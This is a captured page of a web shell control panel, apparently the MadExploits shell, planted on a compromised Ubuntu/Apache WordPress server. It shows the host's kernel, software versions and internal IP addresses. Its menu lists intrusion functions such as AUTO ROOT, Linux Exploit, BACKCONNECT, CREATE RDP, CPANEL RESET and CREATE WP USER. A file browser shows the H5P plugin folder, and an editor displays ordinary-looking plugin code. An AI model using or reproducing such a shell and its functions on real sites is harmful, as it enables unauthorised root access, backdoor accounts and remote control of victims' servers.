Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
plugins /
h5p /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
scripts
[ DIR ]
drwxr-x--x
styles
[ DIR ]
drwxr-x--x
views
[ DIR ]
drwxr-x--x
class-h5p-content-admin.php
36.27
KB
-rwxr-x--x
class-h5p-content-query.php
7.65
KB
-rwxr-x--x
class-h5p-editor-wordpress-aja...
4.14
KB
-rwxr-x--x
class-h5p-editor-wordpress-sto...
8.54
KB
-rwxr-x--x
class-h5p-library-admin.php
24.59
KB
-rwxr-x--x
class-h5p-plugin-admin.php
45.69
KB
-rwxr-x--x
class-h5p-privacy-policy.php
18.75
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-h5p-editor-wordpress-ajax.php
<?php class H5PEditorWordPressAjax implements H5PEditorAjaxInterface { /** * Gets latest library versions that exists locally * * @return array Latest version of all local libraries */ public function getLatestLibraryVersions() { global $wpdb; // Get latest version of local libraries $major_versions_sql = "SELECT hl.name, MAX(hl.major_version) AS major_version FROM {$wpdb->prefix}h5p_libraries hl WHERE hl.runnable = 1 GROUP BY hl.name"; $minor_versions_sql = "SELECT hl2.name, hl2.major_version, MAX(hl2.minor_version) AS minor_version FROM ({$major_versions_sql}) hl1 JOIN {$wpdb->prefix}h5p_libraries hl2 ON hl1.name = hl2.name AND hl1.major_version = hl2.major_version GROUP BY hl2.name, hl2.major_version"; return $wpdb->get_results( "SELECT hl4.id, hl4.name AS machine_name, hl4.title, hl4.major_version, hl4.minor_version, hl4.patch_version, hl4.restricted, hl4.has_icon FROM ({$minor_versions_sql}) hl3 JOIN {$wpdb->prefix}h5p_libraries hl4 ON hl3.name = hl4.name AND hl3.major_version = hl4.major_version AND hl3.minor_version = hl4.minor_version"); } /** * Get locally stored Content Type Cache. If machine name is provided * it will only get the given content type from the cache * * @param $machineName * * @return array|object|null Returns results from querying the database */ public function getContentTypeCache($machineName = NULL) { global $wpdb; // Return info of only the content type with the given machine name if ($machineName) { return $wpdb->get_row($wpdb->prepare( "SELECT id, is_recommended FROM {$wpdb->base_prefix}h5p_libraries_hub_cache WHERE machine_name = %s", $machineName )); } return $wpdb->get_results( "SELECT * FROM {$wpdb->base_prefix}h5p_libraries_hub_cache" ); } /** * Gets recently used libraries for the current author * * @return array machine names. The first element in the array is the * most recently used. */ public function getAuthorsRecentlyUsedLibraries() { global $wpdb; $recently_used = array(); $result = $wpdb->get_results($wpdb->prepare( "SELECT library_name, max(created_at) AS max_created_at FROM {$wpdb->prefix}h5p_events WHERE type='content' AND sub_type = 'create' AND user_id = %d GROUP BY library_name ORDER BY max_created_at DESC", get_current_user_id() )); foreach ($result as $row) { $recently_used[] = $row->library_name; } return $recently_used; } /** * Checks if the provided token is valid for this endpoint * * @param string $token * * @return bool True if successful validation */ public function validateEditorToken($token) { return wp_verify_nonce($token, 'h5p_editor_ajax'); } /** * Get translations for a language for a list of libraries * * @param array $libraries An array of libraries, in the form "<machineName> <majorVersion>.<minorVersion> * @param string $language_code * @return array */ public function getTranslations($libraries, $language_code) { global $wpdb; $querylibs = ''; foreach ($libraries as $lib) { $querylibs .= (empty($querylibs) ? '' : ',') . '%s'; } array_unshift($libraries, $language_code); $result = $wpdb->get_results($wpdb->prepare( "SELECT hll.translation, CONCAT(hl.name, ' ', hl.major_version, '.', hl.minor_version) AS lib FROM {$wpdb->prefix}h5p_libraries hl JOIN {$wpdb->prefix}h5p_libraries_languages hll ON hll.library_id = hl.id WHERE hll.language_code = %s AND CONCAT(hl.name, ' ', hl.major_version, '.', hl.minor_version) IN ({$querylibs})", $libraries )); $translations = array(); foreach ($result as $row) { $translations[$row->lib] = $row->translation; } return $translations; } }
Close